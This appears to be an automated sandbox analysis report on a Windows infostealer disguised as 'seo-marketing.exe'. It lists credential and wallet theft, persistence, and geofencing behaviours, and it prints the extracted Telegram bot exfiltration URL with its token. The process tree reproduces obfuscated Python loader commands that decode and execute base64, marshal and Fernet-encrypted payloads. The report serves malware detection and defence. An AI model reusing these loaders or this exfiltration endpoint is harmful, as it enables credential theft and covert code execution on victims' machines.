Analysis
-
max time kernel
116s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06-08-2024 05:35
Static task
static1
Behavioral task
behavioral1
Sample
seo-marketing.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
seo-marketing.exe
Resource
win10v2004-20240802-en
General
-
Target
seo-marketing.exe
-
Size
60.2MB
-
MD5
2bf7d4849bcf39691c8c49ed1ac92f76
-
SHA1
f2c477fa8d31b6b4f69ec910d81edc230a696d8e
-
SHA256
133e7b9b8be02554a282cc51be5a419d7c867bf0ad30939077121029843d4cd2
-
SHA512
b757b804c82e061c37aaa6e059f0a6a72da57beeddbf16ea898be4db60afddedb75051a512a11fa69a16120cd9b6c04e1646b7181f501ce3b785b4f995a864e0
-
SSDEEP
1572864:OgvxU1VpeCDiyPKKdBHYSA+H438beTcGleoL:Ogy1VrDmKdY38beTcloL
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7373326479:AAFc-qF_6b4d0zpxZKNAYyps6FvSKGESa2U/sendMessage?chat_id=-4262874204
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/3688-7508-0x000001CE82190000-0x000001CE821A2000-memory.dmp family_xworm -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation seo-marketing.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.lnk python.exe -
Executes dropped EXE 9 IoCs
pid Process 2400 explorer.exe 1008 python.exe 728 python.exe 5088 python.exe 3352 python.exe 3376 python.exe 4736 python.exe 2196 python.exe 3688 python.exe -
Loads dropped DLL 64 IoCs
pid Process 2224 seo-marketing.exe 2400 explorer.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 1008 python.exe 728 python.exe 728 python.exe 728 python.exe 728 python.exe 728 python.exe 728 python.exe 728 python.exe 728 python.exe 728 python.exe 728 python.exe 5088 python.exe 5088 python.exe 5088 python.exe 5088 python.exe 5088 python.exe 5088 python.exe 5088 python.exe 5088 python.exe 5088 python.exe 5088 python.exe 3352 python.exe 3352 python.exe 3352 python.exe 3352 python.exe 3352 python.exe 3352 python.exe 3352 python.exe 3352 python.exe 3352 python.exe 3352 python.exe 3376 python.exe 3376 python.exe 3376 python.exe 3376 python.exe 3376 python.exe 3376 python.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
flow ioc 43 raw.githubusercontent.com 59 raw.githubusercontent.com 14 raw.githubusercontent.com 24 raw.githubusercontent.com 25 raw.githubusercontent.com 54 raw.githubusercontent.com 58 raw.githubusercontent.com 61 raw.githubusercontent.com 15 raw.githubusercontent.com 27 raw.githubusercontent.com 35 raw.githubusercontent.com 42 raw.githubusercontent.com 60 raw.githubusercontent.com -
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 api.ipify.org 18 api.ipify.org 19 api.ipify.org 20 api.ipify.org 21 api.ipify.org 22 api.ipify.org 44 ip-api.com -
pid Process 5088 python.exe 3352 python.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 4188 TASKLIST.exe 4156 TASKLIST.exe 448 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
pid Process 2352 cmd.exe 628 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings seo-marketing.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2148 vlc.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 2196 python.exe 2196 python.exe 2196 python.exe 2196 python.exe 2196 python.exe 2196 python.exe 2196 python.exe 2196 python.exe 2196 python.exe 2196 python.exe 2196 python.exe 2196 python.exe 3688 python.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2148 vlc.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
description pid Process Token: SeDebugPrivilege 4188 TASKLIST.exe Token: 33 1332 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1332 AUDIODG.EXE Token: 33 2148 vlc.exe Token: SeIncBasePriorityPrivilege 2148 vlc.exe Token: SeDebugPrivilege 4156 TASKLIST.exe Token: SeDebugPrivilege 448 tasklist.exe Token: SeIncreaseQuotaPrivilege 3540 wmic.exe Token: SeSecurityPrivilege 3540 wmic.exe Token: SeTakeOwnershipPrivilege 3540 wmic.exe Token: SeLoadDriverPrivilege 3540 wmic.exe Token: SeSystemProfilePrivilege 3540 wmic.exe Token: SeSystemtimePrivilege 3540 wmic.exe Token: SeProfSingleProcessPrivilege 3540 wmic.exe Token: SeIncBasePriorityPrivilege 3540 wmic.exe Token: SeCreatePagefilePrivilege 3540 wmic.exe Token: SeBackupPrivilege 3540 wmic.exe Token: SeRestorePrivilege 3540 wmic.exe Token: SeShutdownPrivilege 3540 wmic.exe Token: SeDebugPrivilege 3540 wmic.exe Token: SeSystemEnvironmentPrivilege 3540 wmic.exe Token: SeRemoteShutdownPrivilege 3540 wmic.exe Token: SeUndockPrivilege 3540 wmic.exe Token: SeManageVolumePrivilege 3540 wmic.exe Token: 33 3540 wmic.exe Token: 34 3540 wmic.exe Token: 35 3540 wmic.exe Token: 36 3540 wmic.exe Token: SeIncreaseQuotaPrivilege 3540 wmic.exe Token: SeSecurityPrivilege 3540 wmic.exe Token: SeTakeOwnershipPrivilege 3540 wmic.exe Token: SeLoadDriverPrivilege 3540 wmic.exe Token: SeSystemProfilePrivilege 3540 wmic.exe Token: SeSystemtimePrivilege 3540 wmic.exe Token: SeProfSingleProcessPrivilege 3540 wmic.exe Token: SeIncBasePriorityPrivilege 3540 wmic.exe Token: SeCreatePagefilePrivilege 3540 wmic.exe Token: SeBackupPrivilege 3540 wmic.exe Token: SeRestorePrivilege 3540 wmic.exe Token: SeShutdownPrivilege 3540 wmic.exe Token: SeDebugPrivilege 3540 wmic.exe Token: SeSystemEnvironmentPrivilege 3540 wmic.exe Token: SeRemoteShutdownPrivilege 3540 wmic.exe Token: SeUndockPrivilege 3540 wmic.exe Token: SeManageVolumePrivilege 3540 wmic.exe Token: 33 3540 wmic.exe Token: 34 3540 wmic.exe Token: 35 3540 wmic.exe Token: 36 3540 wmic.exe Token: SeDebugPrivilege 2196 python.exe Token: SeDebugPrivilege 3688 python.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe -
Suspicious use of SendNotifyMessage 22 IoCs
pid Process 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe 3688 python.exe 2148 vlc.exe 2148 vlc.exe 2148 vlc.exe -
Suspicious use of WriteProcessMemory 54 IoCs
description pid Process procid_target PID 2224 wrote to memory of 2148 2224 seo-marketing.exe 87 PID 2224 wrote to memory of 2148 2224 seo-marketing.exe 87 PID 2224 wrote to memory of 4188 2224 seo-marketing.exe 88 PID 2224 wrote to memory of 4188 2224 seo-marketing.exe 88 PID 2224 wrote to memory of 2400 2224 seo-marketing.exe 91 PID 2224 wrote to memory of 2400 2224 seo-marketing.exe 91 PID 2400 wrote to memory of 4156 2400 explorer.exe 93 PID 2400 wrote to memory of 4156 2400 explorer.exe 93 PID 2400 wrote to memory of 1008 2400 explorer.exe 94 PID 2400 wrote to memory of 1008 2400 explorer.exe 94 PID 1008 wrote to memory of 2856 1008 python.exe 95 PID 1008 wrote to memory of 2856 1008 python.exe 95 PID 2856 wrote to memory of 3008 2856 cmd.exe 96 PID 2856 wrote to memory of 3008 2856 cmd.exe 96 PID 1008 wrote to memory of 4132 1008 python.exe 97 PID 1008 wrote to memory of 4132 1008 python.exe 97 PID 4132 wrote to memory of 4816 4132 cmd.exe 98 PID 4132 wrote to memory of 4816 4132 cmd.exe 98 PID 1008 wrote to memory of 1572 1008 python.exe 99 PID 1008 wrote to memory of 1572 1008 python.exe 99 PID 1572 wrote to memory of 448 1572 cmd.exe 100 PID 1572 wrote to memory of 448 1572 cmd.exe 100 PID 1572 wrote to memory of 2120 1572 cmd.exe 101 PID 1572 wrote to memory of 2120 1572 cmd.exe 101 PID 1572 wrote to memory of 2640 1572 cmd.exe 102 PID 1572 wrote to memory of 2640 1572 cmd.exe 102 PID 1008 wrote to memory of 3540 1008 python.exe 103 PID 1008 wrote to memory of 3540 1008 python.exe 103 PID 2400 wrote to memory of 728 2400 explorer.exe 104 PID 2400 wrote to memory of 728 2400 explorer.exe 104 PID 2400 wrote to memory of 5088 2400 explorer.exe 105 PID 2400 wrote to memory of 5088 2400 explorer.exe 105 PID 5088 wrote to memory of 2352 5088 python.exe 106 PID 5088 wrote to memory of 2352 5088 python.exe 106 PID 2352 wrote to memory of 3620 2352 cmd.exe 107 PID 2352 wrote to memory of 3620 2352 cmd.exe 107 PID 2400 wrote to memory of 3352 2400 explorer.exe 108 PID 2400 wrote to memory of 3352 2400 explorer.exe 108 PID 3352 wrote to memory of 628 3352 python.exe 109 PID 3352 wrote to memory of 628 3352 python.exe 109 PID 628 wrote to memory of 1152 628 cmd.exe 110 PID 628 wrote to memory of 1152 628 cmd.exe 110 PID 2400 wrote to memory of 3376 2400 explorer.exe 111 PID 2400 wrote to memory of 3376 2400 explorer.exe 111 PID 2400 wrote to memory of 4736 2400 explorer.exe 112 PID 2400 wrote to memory of 4736 2400 explorer.exe 112 PID 2400 wrote to memory of 2196 2400 explorer.exe 113 PID 2400 wrote to memory of 2196 2400 explorer.exe 113 PID 2400 wrote to memory of 1128 2400 explorer.exe 115 PID 2400 wrote to memory of 1128 2400 explorer.exe 115 PID 1128 wrote to memory of 5116 1128 cmd.exe 116 PID 1128 wrote to memory of 5116 1128 cmd.exe 116 PID 2400 wrote to memory of 3688 2400 explorer.exe 118 PID 2400 wrote to memory of 3688 2400 explorer.exe 118 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 3620 attrib.exe 1152 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\seo-marketing.exe"C:\Users\Admin\AppData\Local\Temp\seo-marketing.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\marketing.mp4"2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2148
-
-
C:\Windows\system32\TASKLIST.exe"TASKLIST" /FI "STATUS eq RUNNING"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
C:\explorerwi\explorer.exe"C:\explorerwi\explorer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\system32\TASKLIST.exe"TASKLIST" /FI "STATUS eq RUNNING"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c exec(__import__('marshal').loads(__import__('base64').b64decode('YwAAAAAAAAAAAAAAAAUAAAAAAAAA83AAAACXAAkAbgcjAAEAWQBuA3gDWQB3AW4FIwB3AHgDWQB3AQkAZAdkAWUAZAJkA2YEZASEBVoBbgcjAAEAWQBuA3gDWQB3AW4FIwB3AHgDWQB3AWUCWgNlBFoFZQRaBmUCWgdkBVoCZAZaBGQAWghkA1MAKQhU2gFf2gZyZXR1cm5OYwQAAAAAAAAAAAAAAAEAAAADAAAA8wYAAACXAGQAUwApAU6pACkE2gJfX3IBAAAA2gNzdGXaAmFscwQAAAAgICAg2gZ1cm5hbWXaA19fX3IJAAAABwAAAHMGAAAAgACAAIAA8wAAAADpAQAAAOkCAAAAKQJUVCkJ2gNzdHJyCQAAANoFcHJpbnTaCmJhY2tfcHJpbnTaBGV4ZWPaCWJhY2tfZXhlY9oESlZCVNoFU0tZUVPaBXN0YWdlcgQAAAByCgAAAHIIAAAA+gg8bW9kdWxlPnIVAAAAAQAAAHODAAAA8AMBAQHgBAjgBQn48AMAAQyAdIB0+Pj44AgM+IgEiASIBIgE8AIDAQ3YBDvQBDuQM9AEO7Ak0AQ70AQ70AQ70AQ70AQ7+NgAC4B0gHT4+PjYCAz4iASIBIgEiATgDRKACtgMEIAJ2AcLgATYCA2ABdgICYAF2AcIgATYCAyABYAFgAVzJAAAAIIBCwCDAgcDhQULAIsCDQORCRsAmgEjAJsCHwOdBSMAowIlAw==')));JVBT(__import__('marshal').loads(__import__('base64').b64decode('YwAAAAAAAAAAAAAAAAcAAAAAAAAA87QAAACXAGUAZABrAgAAAAByCgIAZQGmAAAAqwAAAAAAAAAAAAEAZAFkAmwCWgJkAWQCbANaA2QDZQRkBGUEZgRkBYQEWgVlBloHZQhaCQIAZQVkBmQHpgIAAKsCAAAAAAAAAABaCgIAZQsCAGUDagwAAAAAAAAAAAIAZQJqDQAAAAAAAAAAZQqmAQAAqwEAAAAAAAAAAKYBAACrAQAAAAAAAAAApgEAAKsBAAAAAAAAAAABAGQCUwApCEbpAAAAAE7aA2tledoLZGF0YV9iYXNlNjRjAgAAAAAAAAAAAAAABgAAAAMAAADz9AAAAIcFlwB0AQAAAAAAAAAAAABqAQAAAAAAAAAAfAGmAQAAqwEAAAAAAAAAAH0CfACgAgAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAACKBXQHAAAAAAAAAAAAAIgFZgFkAYQIdAkAAAAAAAAAAAAAfAKmAQAAqwEAAAAAAAAAAEQApgAAAKsAAAAAAAAAAACmAQAAqwEAAAAAAAAAAH0DdAEAAAAAAAAAAAAAagUAAAAAAAAAAHwDpgEAAKsBAAAAAAAAAACgBgAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAAB9BHwEUwApAk5jAQAAAAAAAAAAAAAACAAAABMAAADzTAAAAJUBlwBnAHwAXSBcAgAAfQF9AnwCiQN8AXQBAAAAAAAAAAAAAIkDpgEAAKsBAAAAAAAAAAB6BgAAGQAAAAAAAAAAAHoMAACRAowhUwCpACkB2gNsZW4pBNoCLjDaAWnaAWLaCWtleV9ieXRlc3MEAAAAICAggNoGdXJuYW1l+go8bGlzdGNvbXA+ehh4b3JfLjxsb2NhbHM+LjxsaXN0Y29tcD4IAAAAczIAAAD4gADQF1bQF1bQF1a5ZLhhwBGYAZhJoGGtI6hpqS6sLtEmONQcOdEYOdAXVtAXVtAXVvMAAAAAKQfaBmJhc2U2NNoJYjY0ZGVjb2Rl2gZlbmNvZGXaBWJ5dGVz2gllbnVtZXJhdGXaCWI2NGVuY29kZdoGZGVjb2RlKQZyAgAAAHIDAAAA2gRkYXRh2gp4b3JfcmVzdWx02g1yZXN1bHRfYmFzZTY0cgsAAABzBgAAACAgICAgQHIMAAAA2gR4b3JfchkAAAAFAAAAc2sAAAD4gADdCxHUCxuYS9ELKNQLKIBE2BATlwqSCpEMlAyASd0RFtAXVtAXVtAXVtAXVsVp0FBUwW/Eb9AXVtEXVtQXVtERV9QRV4BK3RQa1BQkoFrRFDDUFDDXFDfSFDfRFDnUFDmATdgLGNAEGHIOAAAAegkxMjcuMC4wLjFhFAQAAFVqSTNMakF1TUM0eE1USTNMall1TUM0eE1USTMzVlF1TUM2bU1WWTNTakZDTUhReE16SlNMMVFzbGk4eE1aazJMakF1TUM0eE1USnpMbTB4YWl3ek1WYzBMREJMTUVRMU1USTNMakF1TUM1Vk1wUTJMakNGTVM0eE1USTNMakF1bGk4eE1aazJMakF1TUM0eE1USTJMbFFzYWl0Vk5XZzBvaEJLTVgweEdEZmVMakF1TUdEWU1ESTNMbEdhTVM0eFVHVUdXVklkZWg1NGVYaGJUV2g0WEUwQ1kwaDdiWEpIYVhaL1hYeGRmM3QwWG1SSFUyRjFSRk5BWEZsVmRndFpUVjFvUjA5NVdrZHRRMlpYVWtObkFYdHdRa1JOZHhkSVZYRjFhV3AyZWx0cmFXTjhTZ0pHUUV4MlpGVmhabm9mYW5wZWVudDBiMWRuZUh4SVZHWllaWGx0Y1VsNGNuTlFaM05zVzNSbWYwdFNkbkllVTFkd0NIdC9aRnhOYUhoZFVnRmxWSHhEVkVKVmNsVmVUM2g4QUUxNWZBUjdWd2xYYVhaU1JHZ0ZRZ0JQZUhoWVZXcDVRbE5EZmxoVFgyQmJURjUvUlhjRENFWjdIR0pDVWtOVkFGQndhMFozWFdOSFUyVnhYbEpIQ1ZaZ1prSmNTbk1iQUV0NVlGdDhmUVVlYW5aWkFYRmViMWRuYzI5V2VIRjJTV3AyV0VKb1NGcHdkR2hrUlhScFlGMXVSMU5XYVJ4N1FHUUhmR2hOZFh4NFVnSjVXMVJFZm1abldndG5kMXRrV0h0ZFZXSlVhd0ZCZm1rRkJIeGlRbHA3ZFZZRFVIcFlISDVvZG1SaFlsRkhZbDE4WEhjQ2V3ZFVabUZCYW1sblcxRlpRa2RLZUdOQmVtTllTWGx0Y1VsNGNuTlFaM2RrU1hSbWQwQjBSM0ZKZVcxelhWZHdZRnhOZUg5V1kycGZSR3AyY2g1UVpndENaM2RvU21kMlpBUjBSM0ZKZVcxd1ZudDBiMWROZDJoTFVrVUtFOWtzTUM0eEdEVHRLRkpQUTBzSEJlZ3lYRkZBVjB2ck1GdnRLbFZXVlUzck9GQUJHbFJMVTBGVlZPZ3lYa0pIWGxxWU1jRTNMakF1NmloRVExeFdRMVhVT0JKY1hsWkNRbFVRUWlNeE1USTJMakF1UTBJeE1UTEhMVEV2TWZZeFBMSTZyajJ1UGZZNFA3b2lwa0duS0tJcHdUSTBMejNlTUMwd1BMSjI5alFtc0dyaE9DdS9PT1FuS2Q0eE1TbG1LY0V1TUNSak5zWTNManA4Tjk4eE1UZGtLY1F1TUN0aU5zSTNMalY5Ti9ZOVBMSnk5anNpc0dxeGRjSXdMVEVqd0M0eU1EOUZKVEF1TUE9PSkO2gVzdGFnZdoEZXhpdHIPAAAA2gdtYXJzaGFs2gNzdHJyGQAAANoKYmFja19wcmludNoFcHJpbnTaCWJhY2tfZXhlY9oEZXhlY9oOZGVjcnlwdGVkX2RhdGHaBEpWQlTaBWxvYWRzchAAAAByBgAAAHIOAAAAcgwAAAD6CDxtb2R1bGU+ciUAAAABAAAAc6oAAADwAwEBAdgDCIhFgj6APtgECIBEgUaERoBG4AAW0AAW0AAW0AAW0AAW0AAW0AAW0AAW8AIFARmIY/AABQEZoAPwAAUBGfAABQEZ8AAFARnwAAUBGfAOAAkTgAXYBxCABNgRFZAUkGvwAAAkehDxAAASexD0AAASexCADtgABIAEgF2AV4Rd0BMjkDbUEyOgTtETM9QTM9EFNNQFNNEANdQANdAANdAANdAANXIOAAAA')))3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc"4⤵
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc5⤵PID:3008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName"4⤵
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName5⤵PID:4816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "=""4⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\system32\tasklist.exeTASKLIST /FI "STATUS eq RUNNING"5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Windows\system32\find.exefind /V "Image Name"5⤵PID:2120
-
-
C:\Windows\system32\find.exefind /V "="5⤵PID:2640
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'iEMPbz9GB6XvT5YNUT5jndifgFC_uueQgS8I2McPvTg=').decrypt(b'gAAAAABmlIIgebcOZLXmjg8pnwPPBCNszUp4sRVtMO3Rv5WXpS5_rbygcOH13HxXsPFG83EuLTVBwu7zOAPA9emem1aPaql681twGttAuvDAAu6yBOF7yQXtGWI77cB5MF3gE0u6T3J54_6lpIXASOtsNA6GE8cdFv-PePbEan0dV4M7nTmcYWp_AvO1QzZfr7Av4a694vYuiDkD56eRYYWjveR9Z5Zhf5_FyIfGZTJN7pbim4ty3Hq3K23NNJstqAmY8DYN1YNISMo2PMyL-AxczCX0Hw4UZuF_VXsI8hn4PgfcXU_7HdBZUnfxlYOuDtmgl-CvOsUxUQJESTqYNWYvV3fmvUP-fusP2F_d-9rY_cVkPeHDjYTgnY33NGJCn1wuFX3QjySROJUXlpESQkPgD7tMBv6WKTtWa2Ror5mLuVxAI5hcn94MUgtAxkgdvhx6TgPCNKMb5HukgBNOaC3dSSNYKju87F5JQk721vn2lwyHCSg5FehnSSwN9NyUisiC9k-fxJT1MiN73B2Ts2Mlsv9WsDyxYUmakAlYXXns0Bdn5sL-fs7YAA47zcgLaRmSDrB1q6bIlvP5VRFQasPJUq0qo-1D6JhUHGtqOhTc6fdR-Tu4MrmBSyJDrzs7klw8P61IyOAHZQcnV0FuW9ljRLXwroZjH1g2ItTGA-eDAGFY6Vs5ktPWajCXRxAiG08NOA6UYgN0Ve8IOgf8NU8x_aSpQ9UD1uCNPnEZ9pjK2WgBTyPDeMFbBZ-58PYQeu98FxhrSGW1Czrj6s3AFTErJE6zVQ736RIIhk3L3YPZ4lhXZO8AIwyb9jtq2S1sz8TyH3I_gD6SgIH32d0rxGRKKiimL9wzy3gQzAk51xWVZfuswGrkJdob6p4VyBljuKM6Av7DXZs9SjIS_myn8ogi2HNbhQDZ-gghqOlpFdsmorANtJmDZ6RHN1BHqL0CDFCFn3z6s7I3tVb5GxQgGyVcL8-axtFzigwB88NFbljoHTf4W9fGE8txfYUW5X4ErlHs4X-9e_yhWoOGWMPuK6QSp0GZlcqCM_9F8CQMf2MxkOVDTnoIs1aMH9hGLJDMIfz8EWOeOGjXEMrskpQuAsGH2QQn1UMDaqvz5EFfrJHZAvIF4jPfK88QE9eGgw7yYTCmQVnWzMeAmfnxi5lTrkHTWnLeZCM31oUg74MQUCU9tke7NiByTcN2byMtFMMkqvV1GGFtL-756nLKgyNOZr8pEjnzS7UyKcK-7NuRK7Ps9Cx9J8kNZOEc0DfAmpRqtpntFfbq2dtPiG-Pb-f3v3lW5F46JExI9ESO9a0g4gKM7kSuaSnsc-SrW3PCTN2QlYYTw4DCJeYZLXTtLYvaIz1qe4oGVprbe1W52t25sXO-08-51WTjRX6XJvoP23LLF8FlkuZcpL9oOljd7hpoFDsDjJO8syiNG29JTnuyPbBTlLKRNM0w4dRr0THHYnlKZFGxQNE614Kuih1vmFZNlYMg17tYQNLggHSDNNsz6omUWdzmm-ZkE_N086xs3o-6HFCkI04Mgz8OqzebcX9q4iNAWScKC-ObXcxVAiVc15U7oHv5a8KLB3-kMOZJU9cOcq4-HDVuo6fBCRiIQiIS58-snOGCu2m5d82si_ysiy8-3Sj_31AeRYjMogkGDWmbN5rkA6WfTCf2nmFaMtxJ_fVRWMblj2sG9vCZufn9mMQ4lGWYNxDTkGFxzBYtYjsjREirJmVo_aD5gJ9fnwdDAhRwkI7H96X_fdsD1fhEWDMClk0P-y45Agfv3uA3Ojx0b4j4slPIOQ73DfoAjnw08H107ykw0EF6QDOTDsqIsdWV-RktPIZw8JR1ZnfjqnnjQZiy9o6luXcD5Vnv1s-x8cHqsIVAt4ZHFSE6enDdjxb-UzhO_nXTnAx4a4uaPrnAyzjDZ7FQAJNU00spCCKTlyrpkZRAKsfTjf7jpwiSQv2hxJeSF3DgHTW8TrsrGbEW0qrNr2xiYvyrufF2mbvNjlIqw44_MX7maRSJtiUov-ps0VWjJMflFyHvfn8EUfKOr-y2qjdxA2kaC9_M_RpfOlMbgNisEfbFcFX1yTVSiW6lmqasnl1NZ425z7WGZGbVUb7snmKQMd0w4bZPtnPkQqVF-qXV2VOlU1d7-KXsHVeflCGFl3j4mE04FGZS0b7yDDR42kDUiIIgNoCYbQ_rbU3mqUYjLiBNB7FOhprH1ETuE-b0z4LT3PgsQU9r90R_B5UXORjBpM0a3ubebotNgW0m9db4o-a1FYJjbQGCSKUJEUEGbdYt_cN2LLVJ5_u4g1vsHHGQh_IfBPnSPHNR2xoCO-WBlI3ZHvT9WLpCHjDIKgY8hzTjZ6xjDnpcUqJ7jUvH5oMZT_eMDeWhnUub-oiRP8LIv4F4dGXgKs4UF2Y-liIRStQpOSWaRK1sMzh9hpqQUdNL9pXUGlYqbU7EHdqqMyp8wHCh_EZ3LnBAveStaW906P0qy5rRodRx0Inv68begWOuN2yJdDC8TyDnYg8fBxzQowYHf1npZGBbYBRR3UeIyO43oQ05TH3O5Snnp_tGneIZUrUlJME14b0uIQK5jC4m0GvA_QEP5mxT55qCqfvtCNLd2wNua4fatdQG6LQCWAxg13PQFfZ01GbCfV6asXa-_QaDB6jmoZX_MjaNLTt7tQv7jq9eCIl79xKMd7CRUAM95x__n4MN5Jg54dRj2PutpvR6zOwsVSUSSPnmkMBunPiZlQheXak6y8PaxR6inEAGVVodW8xM5LQw6UR_68XCQiUEP-jnwdVMJijCH23e3OjqXSBX24jXj743KdCAf3DERoCRXfD_IBTsNp0pfnp1Vbb58hphl1yFjZsQr895fXTOcRoh25jSMKVrzJ_dgXaSiYeE1dUA_svp9k6D5n9IcjJlXXRRz9qo9Vx_EXIWOrvzSLKPiRGHCX8DVrqqG5sbUYvJbh28XbHAOO86Y1KHh6zUT-87z-QI41R-gdMGkWlBqvQDmtfBx45RVLurNQxeFNsTIEFDh79K9rD8-QU0rujTfGRYe7u7PqDOerDM-UKX9liuXXV0dCcgBPJbD3-WLzyuIm2qCpOidFh2KHVQQ2dP4Fto64k15PSGjx0ivwHiNv7Wfp7-AMmIT6Z2Ua3jFcBB2UyK8_oXofkV1GeYi8k29FwLKmoFuUyDa8laHlIcI7iIxE